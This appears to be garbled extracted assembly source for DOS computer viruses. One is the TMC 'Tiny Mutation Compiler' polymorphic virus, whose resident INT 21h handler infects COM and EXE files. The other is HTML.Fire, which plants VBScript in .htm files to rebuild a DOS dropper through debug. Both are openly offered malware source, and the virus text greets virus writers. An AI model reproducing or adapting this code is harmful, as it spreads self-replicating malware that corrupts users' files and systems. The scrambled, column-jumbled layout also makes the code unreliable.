0240 0250 0251
time date
EQU EQU
0300 0301
old_prog
EQU
0101
_start in_mem
EQU EQU
0000 0102
old_inst
EQU
8000
;============================ CODE ====================================== src: src_startup: BLOCK _start ; lea bp, [1234h] I< dw 02e8dh, 1234h > I< cld > I< I< RELO I< I< I< I< I< I< I< RELO
mov mov save_ds dec mov mov cmp _JB push pop mov max_mem
I< RELO I< I<
mov min_mem mov int _JC
I< I< RELO I< RELO I< I<
mov mov max_mem sub min_mem dec cmp _JB int _JC mov add
I< I< I<
ax, ds word ptr [bp+1234h], ax
> >
ax ds, ax ax, word ptr ds:[3] ax, 1900h exit cs ds word ptr [bp+1234h], ax
> > > >
bx, word ptr [bp+1234h]
>
ah, 4ah 21h exit
> >
ah, 48h bx, word ptr [bp+1234h]
> >
bx, word ptr [bp+1234h]
>
bx bx, mem4compile exit 21h exit es, ax word ptr es:[@last_rnd], 06942h
> >
> > >
> > >
include src\compiler.inc BLOCK I< RELO I< RELO I< I< I<
end_of_compile mov ax, [bp+1234h] save_ds mov cx, [bp+1234h] old_ss add cx, 10h add cx, ax push cx
> > > > >
I< RELO I< RELO I< I< I< I< RELO I< I< RELO I< I< I< RELO
push word ptr [bp+1234h] old_sp mov cx, [bp+1234h] old_cs add cx, 10h add cx, ax push cx push word ptr [bp+1234h] old_ip push ax push word ptr [bp + 1234h] old_max_mem push ds mov cl, 0 cmp byte ptr [bp+1234h], cl filetype _JNZ install
>
I< RELO I< I< I< I<
lea si, [bp+1234h] old_inst mov ax, cs:[si] mov word ptr cs:[100h], ax mov al, cs:[si+2] mov byte ptr cs:[102h], al JUMP install
>
BLOCK I< RELO I< RELO I< I< I< I< RELO I< RELO I< I< I< I< RELO I< I< RELO I< I< I< RELO
clean_ofajc mov ax, [bp+1234h] save_ds mov cx, [bp+1234h] old_ss add cx, 10h add cx, ax push cx push word ptr [bp+1234h] old_sp mov cx, [bp+1234h] old_cs add cx, 10h add cx, ax push cx push word ptr [bp+1234h] _old_ip push ax push word ptr [bp + 1234h] old_max_mem push ds mov cl, 0 cmp byte ptr [bp+1234h], cl filetype _JNZ install
I< RELO I< I< I< I<
lea si, [bp+1234h] _old_inst mov ax, cs:[si] mov word ptr cs:[100h], ax mov al, cs:[si+2] mov byte ptr cs:[102h], al JUMP install
BLOCK I<
install xor ax, ax
> > > > > > > > > >
> > > >
> > > > > > > > > > > > > > > >
> > > > >
>
I< I<
mov cmp _JZ
ds, ax byte ptr ds:[501h], 10h old_prog
> >
ifndef I< endif
DEBUG mov
byte ptr ds:[501h], 10h
>
I< I<
push pop
es ds
> >
I< I< I< RELO I< I< RELO I< I< I<
mov ax, ds:[in_mem_ofs] sub ax, @free mov [bp+1234h], ax ofs_in_mem mov cx, ds:[new_vir_size] mov [bp+1234h], cx vir_size mov si, @free xor di, di rep movsb
> > >
I< I< I< I< RELO I< RELO I< I< I< I<
mov shr inc mov max_mem sub min_mem sub dec dec cmp _JB mov int _JC mov mov int _JC
cl, 4 di, cl di bx, [bp+1234h]
> > > >
bx, [bp+1234h]
>
bx, di bx bx bx, di old_prog ah, 4ah 21h old_prog bx, di ah, 48h 21h old_prog
> > > >
I< I< I< I< I<
dec mov mov inc mov
ax es, ax word ptr es:[1], 8 ax es, ax
> > > > >
I< RELO I< I< I<
mov cx, [bp+1234h] vir_size xor si, si xor di, di rep movsb
> > >
I<
push
>
I< RELO I< RELO I< RELO
push word ptr [bp + 1234h] ofs_in_mem mov al, [bp + 1234h] xor_const mov ah, [bp + 1234h] xor_add
I< I< I< I< I<
es
> > > > >
> > > > >
>
> > >
I<
retf
BLOCK I< I<
exit mov int
BLOCK I< I< ;I< I< I< ;I< I< I< I< I< I< I<
@rnd push in mov mov in mov xor mov rol mov pop ret
BLOCK I<
;I< I< I< I< I< I<
@rnd_max or bp, bp _JZ @rnd_max_0 push dx CALLL @rnd mov ax, 1 xor dx, dx div bp xchg ax, dx pop dx ret
BLOCK I< I<
@rnd_max_0 xor ax, ax ret
BLOCK I< RELO I< I< I< RELO I< RELO I< RELO I< I< RELO I< I<
read_byte mov [bp + 1234h], ah save_ah mov ax, si sub ax, bp sub ax, 1234h src_src mul word ptr [bp + 1234h] xor_add add al, [bp + 1234h] xor_const xor al, ds:[si] mov ah, [bp + 1234h] save_ah inc si ret
BLOCK
I< I<
read_word CALLL read_byte mov ah, al CALLL read_byte xchg al, ah ret
BLOCK I<
old_prog pop es
I<
I<
>
ax, 4c00h 21h
> >
cx al, 40h al, 0 ah, al al, 40h al, 0 ax, es:[@last_rnd] cl, ah ax, cl es:[@last_rnd], ax cx
> > > > > > > > > > > >
> > > > > > > >
> >
> > > > > > > > > >
> > >
>
I< I< I< I< I< I< I< I<
mov int pop pop mov mov mov int
ah, 21h bx ax ds, es, ah, 21h
49h
I< RELO I< I< I< I<
lea bx, [bp + 1234h] old_entry pop ax mov cs:[bx+1], ax pop ax mov cs:[bx+3], ax
>
I< I< I<
pop pop mov JUMP
> > >
BLOCK D<
old_entry db 0EAh, 0, 0, 0, 0
ax ax 4ah
ax ss sp, ax old_entry
> > > > > > > >
> > > >
>
;============================ DATA ====================================== BLOCK save_ah D< db 0 > BLOCK @JMPS D< dw START_JMPS > BLOCK xor_const D< db 0 > BLOCK xor_add D< dw 0 > BLOCK filetype D< db 0 > BLOCK old_inst D< db 0c3h, 0, 0 > BLOCK _old_inst D< db 0c3h, 0, 0 > BLOCK old_cs D< dw -10h > BLOCK old_ss D< dw -10h > BLOCK old_ip D< dw 100h > BLOCK _old_ip D< dw 100h > BLOCK old_sp D< dw 0fffeh > BLOCK min_mem D< dw 1000h > BLOCK old_max_mem D< dw 0ffffh > BLOCK max_mem D< dw 0 > BLOCK save_ds D< dw 0 > BLOCK vir_size D< dw 0 > BLOCK ofs_in_mem D< dw 0 > BLOCK src_src
db
M_STOP, M_END
;============================ CODE ====================================== src_vir: BLOCK in_mem I< xor bp, bp > I< mov ds, bp > I< mov bx, ds:[46Dh] > I< push cs > I< pop ds > I< and bx, 0FFF0h > I< mov ds:[1234h], bx > RELO ticks CALLL crypt_data CALLL @rnd I< mov ds:[1234h], al > RELO xor_const I< mov ds:[1234h], ah > RELO xor_add CALLL crypt_data I< mov ax, 3521h > I< int 21h > I< mov di, 1234h > RELO old21 I< mov word ptr ds:[di], bx > I< mov word ptr ds:[di+2], es > I< mov dx, 1234h > RELO int21 I< mov ax, 2521h > I< int 21h > JUMP old_prog BLOCK I< RELO I<
crypt_data mov si, 1234h src_src mov cx, offset src_end - offset src JUMP crypt_next_byte
BLOCK I< I< I< I<
crypt_next_byte xor ds:[si], al inc si add al, ah dec cx _JNZ crypt_next_byte ret
I<
> >
> > > > >
include src\tsr.inc ;============================ DATA ====================================== BLOCK text_text D< db 13, 10, 13, 10, 'þ TMC 1.0 by Ender þ', 13, 10, 'Welcome to the Tiny Mutation Compiler!', 13, 10, 'Dis is level 6*9.', 13, 10, 'Greetings to virus makers: Dark Avenger, Vyvojar, SVL, Hell Angel', 13, 10, 'Personal greetings: K. K., Dark Punisher',13, 10 , 13, 10 > db M_STOP, M_END src_end:
TSR.INC
;INFECT_ONLY_CMM_EXX = 1 BLOCK I< I< I< I< I<
int21 cld CALLL cmp _JZ cmp _JZ cmp _JZ cmp _JNZ JUMP
> push_all ah, 3ch infect_floppy ah, 3dh infect_floppy ah, 3eh infect_close ah, 4bh call_int21 infect_and_call_int21
BLOCK
infect_and_call_int21 CALLL infect JUMP call_int21
BLOCK
call_int21 CALLL pop_all jmp dword ptr cs:[1234h] old21
I< RELO BLOCK I< I< I< I< I<
infect_floppy mov si, dx lodsb cmp byte ptr ds:[si], ':' _JNZ no_drive_pressed or al, 20h cmp al, 'b' _JA call_int21 JUMP infect_in_close
BLOCK I< I< I< I< I<
no_drive_pressed push ax mov ah, 19h int 21h cmp al, 1 pop ax _JA call_int21 JUMP infect_in_close
BLOCK I<
infect_in_close cmp ah, 3ch _JNZ infect_and_call_int21 xor bx, bx CALLL check4handle _JNZ call_int21 CALLL init_int24 mov ah, 60h dec si push cs pop es mov di, 1234h path int 21h _JC no_inf_int24 CALLL pop_all pushf call dword ptr cs:[1234h] old21
I<
I< I< I< I< I< RELO I< ; I< I< RELO
> > > >
>
> > > > >
> > > > >
> >
> > > > > >
> >
I< I< I< I< I< RELO I< I< I< BLOCK
I< I< RELO I< I< RELO I< I< I< I< RELO I< I< I<
CALLL pushf mov adc and mov handle CALLL popf CALLL sti retf
push_all bx, 0FFFFh bx, 0 ax, bx cs:[1234h], ax
> > > > >
deinit_int24 > pop_all 2
infect_close CALLL check4handle _JC call_int21 xor ax, ax mov cs:[1234h], ax handle CALLL pop_all pushf call dword ptr cs:[1234h] old21 CALLL push_all pushf push cs pop ds mov dx, 1234h path CALLL infect popf CALLL pop_all sti retf 2
> >
> >
> >
> > > >
> > >
; BX - handle ; if CF=1: different handle or different PSP ; if ZF=1: different PSP or BX=HANDLE BLOCK check4handle I< push bx I< mov ah, 62h I< int 21h I< mov di, 1234h RELO psp I< cmp cs:[di], bx I< mov cs:[di], bx I< mov di, 1234h RELO handle _JNZ new_psp I< pop bx I< mov ax, bx I< sub ax, word ptr cs:[di] I< add ax, 0FFFFh I< inc ax I< ret
> > > > > >
BLOCK I< I< I< I< I<
> > > > >
new_psp mov word ptr cs:[di], 0 xor ax, ax pop bx stc ret
> > > > > > >
BLOCK I< I< I< I< I< I< I< I< I< I< ifdef I< endif I< I< ifdef I< endif I<
BLOCK I< I< I< I<
BLOCK I< I< I< I< I< I< I<
infect push ds pop es mov di, dx mov cx, 67d xor al, al repne scasb _JNZ no_inf lea si, [di - 5] lodsw or ax, 2020h mov bx, 'mo' INFECT_ONLY_CMM_EXX mov bx, 'mm'
cmp _JZ JUMP
ax, 'e.' file_ok no_inf
>
file_ok lodsw or cmp _JNZ sub JUMP
ax, 2020h ax, bx no_inf si, 4 prepare_str
prepare_str dec si mov al, [si] cmp al, '/' _JZ str_start cmp al, '\' _JZ str_start cmp al, ':' _JZ str_start cmp si, dx _JA prepare_str dec si JUMP str_start
I<
cmp _JZ cmp _JZ cmp _JZ cmp _JZ
I<
> >
str_start inc si lodsw or ax, 2020h xor ax, 0AA55h
I<
> > > >
cmp ax, 'c.' _JZ file_ok mov bx, 'ex' INFECT_ONLY_CMM_EXX mov bx, 'xx'
BLOCK I< I< I< I<
I<
> > > > > >
ax, ('ci' no_inf ax, ('on' no_inf ax, ('ew' no_inf ax, ('bt' no_inf
> >
> > > >
> > > > > > >
> > >
xor 0AA55h)
>
xor 0AA55h)
>
xor 0AA55h)
>
xor 0AA55h)
>
I<
xor 0AA55h)
>
xor 0AA55h)
>
xor 0AA55h)
>
xor 0AA55h)
>
cmp _JZ cmp _JZ cmp _JZ
ax, ('oc' xor 0AA55h) no_inf ax, ('iw' xor 0AA55h) no_inf ax, ('rk' xor 0AA55h) no_inf
>
CALLL
init_int24
mov pushf call old21 _JC
ax, 3d02h dword ptr cs:[1234h]
I<
mov
bx, ax
>
I< I< I<
xor mov mov
ax, ax ds, ax si, ds:[46Dh]
> > >
I< I< I< I<
push push pop pop
cs cs ds es
> > > >
I< I<
mov int _JC
ax, 05700h 21h close
> >
I< RELO I< I< I<
mov date mov and cmp _JZ
ds:[1234h], dx
>
al, cl al, 00011111b al, 4 close
> > >
I< I< I< RELO
and or mov time
cl, 11100000b cl, 4 ds:[1234h], cx
> > >
I< I< RELO
si, 0FFF0h ds:[1234h], si
> >
I< RELO
and cmp ticks _JZ mov ticks
close ds:[1234h], si
>
I< I< I< RELO
mov ah, 3fh mov cx, 18h mov dx, 1234h exe_header
I< I< I<
I< I< I<
I< I< I< RELO
cmp _JZ cmp _JZ cmp _JZ cmp _JZ
ax, ('va' no_inf ax, ('-f' no_inf ax, ('cs' no_inf ax, ('lc' no_inf
> >
> > >
no_inf_int24
> > >
I< I<
mov int _JC
si, dx 21h close
> >
I< I< I< I<
mov cwd xor int
ax, 4202h cx, cx 21h
> > > >
I<
mov
word ptr ds:[0], 02e8dh
>
I<
cmp _JZ cmp _JZ
word ptr ds:[si], 'ZM' exe_infect word ptr ds:[si], 'MZ' exe_infect
>
I<
>
I< RELO
mov byte ptr ds:[1234h], cl filetype
>
I<
cmp _JB
ax, 3000d close
I<
cmp _JA
ax, 57000d close
I< I< RELO I< I< I< I< RELO I< RELO I< I< RELO I< I< I<
push si mov di, 1234h exe_header mov cl, ds:[di] mov byte ptr ds:[di], 0E9h inc di mov ds:[1234h], cl old_inst mov ds:[1234h], cl _old_inst mov cx, ds:[di] mov si, 1234h old_inst mov ds:[si + 1], cx sub ax, 3 stosw
> >
I< I< RELO
mov cmp @JMPS _JA mov CALLL sub add JUMP
> >
; min 3kb
> ; max 57kb
I< I< I<
BLOCK I< RELO I< I< I< I< RELO I< RELO
ax, BAD_CLEAN word ptr ds:[1234h], ax no_com_ojeb bp, 16 @rnd_max ax, 8 cx, ax no_com_ojeb
no_com_ojeb mov si, 1234h _old_inst mov ds:[si + 1], cx pop si mov ax, -10h mov ds:[1234h], ax old_cs mov ds:[1234h], ax old_ss
COM file
COM file >
> > > > > > > > > >
> > >
> > > > > >
I< I< RELO I< RELO I< I< RELO I< I< RELO I< I< RELO
mov ax, 100h mov ds:[1234h], old_ip mov ds:[1234h], _old_ip mov ax, 0FFFEh mov ds:[1234h], old_sp inc ax mov ds:[1234h], old_max_mem mov ax, 1000h mov ds:[1234h], min_mem
ax
> >
ax
>
ax
> >
ax
> >
ax
> >
I< I< I< I<
mov cwd xor int
cx, cx 21h
I<
add JUMP
ax, 100h set_marker
BLOCK I< I< I< I< RELO I<
set_marker mov ds:[2], ax mov ah, 40h cwd mov cx, 1234h in_mem int 21h _JC close
I< I< I< I<
mov cwd xor int
cx, cx 21h
I< I< I< I<
mov mov mov int _JC
ah, 40h dx, si cx, 18h 21h close
> > > >
I< I< RELO I< RELO I<
mov mov time mov date int JUMP
ax, 5701h cx, ds:[1234h]
> >
dx, ds:[1234h]
>
21h close
>
BLOCK I< I<
close mov int JUMP
ah, 3eh 21h no_inf_int24
> >
BLOCK
no_inf_int24 CALLL deinit_int24 JUMP no_inf
BLOCK I<
no_inf ret
ax, 4202h
ax, 4200h
> > > > >
> > > > >
> > > >
>
BLOCK I< I< RELO
exe_infect inc cx mov byte ptr ds:[1234h], cl filetype
I<
or _JNZ cmp _JB JUMP
> >
; min 10kb
I<
EXE file
dx, dx no_short_exe ax, 10000d close no_short_exe
> >
; max 400kb EXE file BLOCK I<
no_short_exe cmp dx, 400 / 66 _JA close
I< I< I< I< I< I< I< I<
push push mov div inc cmp pop pop _JNZ
ax dx cx, 200h cx ax [si + 04h], ax dx ax close
> > > > > > > >
I< I< I< I<
push push xor cmp _JZ
ax dx ax, ax word ptr ds:[si + 0ch], 0FFFFh max_mem_FFFF
> > > >
I< I< I< I< I<
mov inc mov shl sub JUMP
ax, [si + 4] ax cl, 5 ax, cl ax, [si + 8] max_mem_FFFF
> > > > >
BLOCK I< I< RELO I< I< RELO I< I< RELO I< I< RELO I< RELO I< I< RELO
max_mem_FFFF add ax, [si + 0ch] mov ds:[1234h], ax old_max_mem mov ax, [si + 0eh] mov ds:[1234h], ax old_ss mov ax, [si + 10h] mov ds:[1234h], ax old_sp mov ax, [si + 14h] mov ds:[1234h], ax old_ip mov ds:[1234h], ax _old_ip mov ax, [si + 16h] mov ds:[1234h], ax old_cs
I< I< I<
pop pop push
dx ax ax
>
> > > > > > > > > > >
> > >
I<
push
dx
>
I< I< I< I< I< I< I< I< I<
mov mov mov mov div sub inc mov mov
word ptr [si + 0ch], 0FFFFh word ptr [si + 10h], 07ffeh word ptr [si + 14h], 0 cx, 10h cx ax, [si + 8] ax [si + 0eh], ax [si + 16h], ax
> > > > > > > > >
I< I< I< I< I< I< I<
mov inc mov shl sub add mov
ax, ax cl, ax, ax, ax, di,
> > > > > > >
I< I< I< I< I< I< I< I< RELO I<
pop pop and add adc mov int add in_mem adc
cx dx dx, dx, cx, ax, 21h ax,
dx, 0
>
I< I< I< I< I< I< I<
mov div mov add adc mov mov
cx, cx [si dx, ax, [si [si
> > > > > > >
I< I< I< I< I< I< RELO
inc mov shl sub add mov min_mem
ax cl, 5 ax, cl ax, [si + 8] ax, [si + 0ah] word ptr ds:[1234h], ax
> > > > > >
I<
sub _JBE add JUMP
di, ax write_exeh [si + 0ah], di write_exeh
>
I<
BLOCK I< I< RELO I< I< I< I<
[si + 04h] 5 cl [si + 8] [si + 0ah] ax
not 0fh 10h 0 4200h 1234h
200h + 02h], dx 0FFFFh 0 + 04h], ax + 0ah], 800h
write_exeh mov ax, BAD_CLEAN cmp word ptr ds:[1234h], ax @JMPS mov ax, 0 _JA set_marker mov bp, 16 CALLL @rnd_max sub al, 8 mov di, 1234h
> > > > > > > >
>
> > > > > >
RELO I< I< I<
_old_ip add mov mov JUMP
BLOCK I< I<
int24 mov iret
BLOCK I< I< I< I< I< I< I< I< RELO I< RELO I< RELO I< I< I< I< I< I<
init_int24 push dx push ds push es push cs pop ds mov ax, 3524h int 21h mov ds:[1234h], es int24_seg mov ds:[1234h], bx int24_ofs mov dx, 1234h int24 mov ax, 2524h int 21h pop es pop ds pop dx ret
BLOCK I< I< RELO I< RELO I< I< I< I<
deinit_int24 push ds mov dx, cs:[1234h] int24_ofs mov ds, cs:[1234h] int24_seg mov ax, 2524h int 21h pop ds ret
BLOCK I< RELO I< I< I< I< I< I< I< I< I< I< RELO
push_all pop word ptr cs:[1234h] exit_adr push ax push bx push cx push dx push si push di push bp push ds push es jmp word ptr cs:[1234h] exit_adr
BLOCK I< RELO I< I<
pop_all pop word ptr cs:[1234h] exit_adr pop es pop ds
ds:[di + 1], al word ptr ds:[0], 0ed33h ax, 09090h set_marker
> > >
al, 3
> >
> > > > > > > > > > > > > > > >
> > > > > > >
> > > > > > > > > >
> > >
I< I< I< I< I< I< I< I< RELO
pop bp pop di pop si pop dx pop cx pop bx pop ax jmp word ptr cs:[1234h] exit_adr
BLOCK D< BLOCK D< BLOCK D< BLOCK D< BLOCK D< BLOCK D< BLOCK D< BLOCK D< BLOCK D< BLOCK D< BLOCK D<
old21 dd 0 int24_seg dw 0 int24_ofs dw 0 exit_adr dw 0 exe_header db 18h dup(0) ticks dw 0 time dw 0 date dw 0 psp dw 0 handle dw 0 path db 7 dup(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0ah)
> > > > > > >
> > > > > > > > > > >
MACROS.INC
MAX_CODE_SIZE
EQU
M_END M_CODE M_CALL M_JMP M_RELO M_BLOCK M_STOP
0 0E8h 0E8h 0E9h 0EDh 0EEh 0EFh
EQU EQU EQU EQU EQU EQU EQU
START_JUMP
EQU
M_J_COND EQU M_JO EQU M_JNO EQU M_JC EQU M_JB EQU M_JNAE EQU M_JNB EQU M_JAE EQU M_JZ EQU M_JE EQU M_JNZ EQU M_JNE EQU M_JBE EQU M_JNA EQU M_JNBE EQU M_JA EQU
0F0h 0F0h 0F1h 0F2h 0F2h 0F2h 0F3h 0F3h 0F4h 0F4h 0F5h 0F5h 0F6h 0F6h 0F7h 0F7h
M_JS M_JNS M_JP M_JPE M_JNP M_JPO M_JL M_JNGE M_JNL M_JGE M_JLE M_JNG M_JNLE M_JG
EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU
0F8h 0F9h 0FAh 0FAh 0FBh 0FBh 0FCh 0FCh 0FDh 0FDh 0FEh 0FEh 0FFh 0FFh
_JO
macro db dw endm
num M_JO num
_JNO
macro db dw endm
num M_JNO num
_JC
macro db dw endm
num M_JC num
_JB
macro db dw
num M_JB num
10h
;start of code
0F0h
endm _JNAE
macro db dw endm
num M_JNAE num
_JNB
macro db dw endm
num M_JNB num
_JAE
macro db dw endm
num M_JAE num
_JZ
macro db dw endm
num M_JZ num
_JE
macro db dw endm
num M_JE num
_JNZ
macro db dw endm
num M_JNZ num
_JNE
macro db dw endm
num M_JNE num
_JBE
macro db dw endm
num M_JBE num
_JNA
macro db dw endm
num M_JNA num
_JNBE
macro db dw endm
num M_JNBE num
_JA
macro db dw endm
num M_JA num
_JS
macro db dw endm
num M_JS num
_JNS
macro db dw endm
num M_JNS num
_JP
macro db dw endm
num M_JP num
_JPE
macro db dw endm
num M_JPE num
_JNP
macro db dw endm
num M_JNP num
_JPO
macro db dw endm
num M_JPO num
_JL
macro db dw endm
num M_JL num
_JNGE
macro db dw endm
num M_JNGE num
_JNL
macro db dw endm
num M_JNL num
_JGE
macro db dw endm
num M_JGE num
_JLE
macro db dw endm
num M_JLE num
_JNG
macro db dw endm
num M_JNG num
_JNLE
macro db dw endm
num M_JNLE num
_JG
macro db
num M_JG
dw endm
num
CALLL
macro db dw endm
num M_CALL num
JUMP
macro db dw endm
num M_JMP num
RELO
macro db dw endm
num M_RELO num
BLOCK
macro db dw endm
num M_STOP, M_BLOCK num
I
macro local db inst end_inst: endm
inst end_inst end_inst - $ - 1
D
inst end_inst end_inst - $ - 1 + MAX_CODE_SIZE
macro local db inst end_inst: endm
HTML.Fire is the world's first HTML/DOS hybrid. The virus infects all .htm files in the current directory. It uses VBScript embedded in HTML (this version works under Internet Explorer 4.0 and above) to convert itself back into a DOS executable by running debug with a hex-dump script in a shell. In effect it is a direct-action HTML infector: when run, it finds .htm files on the local disk and places in each a VBScript carrying the hex dump, from which the dropper is reborn.
HTML.Fire.asm
comment * HTML.FIRE BY ULTRAS/MATRiX ~~~~~~~~~~~~~~~~~~~~~~~~~~ First in the world HTML/DOS hybrid. The virus infects all htm files in current The catalogue writes down at the end of a file debug script. The given version Works under Internet Explorer 4.0 and above. * model tiny code org 100 start: mov ah,4e mov dx,offset htm_ find: int 21 jc exit mov ax,3d02 mov dx,9e int 21 jc findnext xchg bx,ax mov ax,5700 int 21 push cx dx cmp dh,80 jae zaraza mov ax,4202 xor cx,cx xor dx,dx int 21 mov si,100 mov di,offset end_virus mov cx,end_virus-start push bx call @1 pop bx call infect pop dx add dh,0c8 push dx zaraza: pop dx cx mov ax,5701 int 21 mov ah,3e int 21 findnext: mov ah,4f jmp find exit: mov ax,4c00 int 21 @1: push cx lodsb mov bx,ax mov cx,4 shr al,cl
push ax call @2 stosb pop ax shl al,cl sub bl,al xchg al,bl call @2 stosb mov ax,' ' stosb pop cx loop @1 stosb stosb ret @2: cmp al,0a jae @3 add al,'0' ret @3: add al,'A'-0a ret infect: mov ah,40 mov dx,offset headerinf mov cx,hendinf-headerinf int 21 mov dx,offset end_virus d_loop: push dx call calcloc call write_par pop dx push dx mov cx,di sub cx,dx cmp cx,60d jb write_d mov cx,60d write_d: mov ah,40 int 21 push ax mov dx,offset echodest mov cx,evirusf-echodest mov ah,40 int 21 pop ax pop dx add dx,ax cmp dx,di jae write_zap jmp d_loop write_zap: mov ah,40 mov dx,offset zap_vir mov cx,end_zap-zap_vir int 21 mov dx,offset endinf mov cx,end_endinf-endinf
mov ah,40 int 21 ret virii db 'FiRe by ULTRAS' write_par: mov cx,enddb-databyte jmp short ech_o mov cx,5 ech_o: mov dx,offset databyte mov ah,40 int 21 ret calcloc: push ax bx cx dx si di sub dx,offset end_virus mov ax,dx mov cx,3 xor dx,dx div cx mov dx,ax add dx,100 mov di,offset hifr mov si,offset loc_ xchg dh,dl mov loc_,dx mov cx,2 call @1 mov di,offset buffer mov si,offset hifr movsw lodsb movsw pop di si dx cx bx ax ret htm_ db '*.htm',0 zap_vir: db 's.WriteLine "ECHO g >>fire.scr"',0dh,0a db 's.WriteLine "ECHO q >>fire.scr"',0dh,0a end_zap: databyte db 's.WriteLine "ECHO E' buffer db '0100 ' enddb: echodest db ' >>' virscr db 'fire.scr"',0dh,0a evirusf: endinf: db 's.WriteLine "debug
',0dh,0a end_endinf: headerinf: db 0dh,0a,'<script Language="VBScript">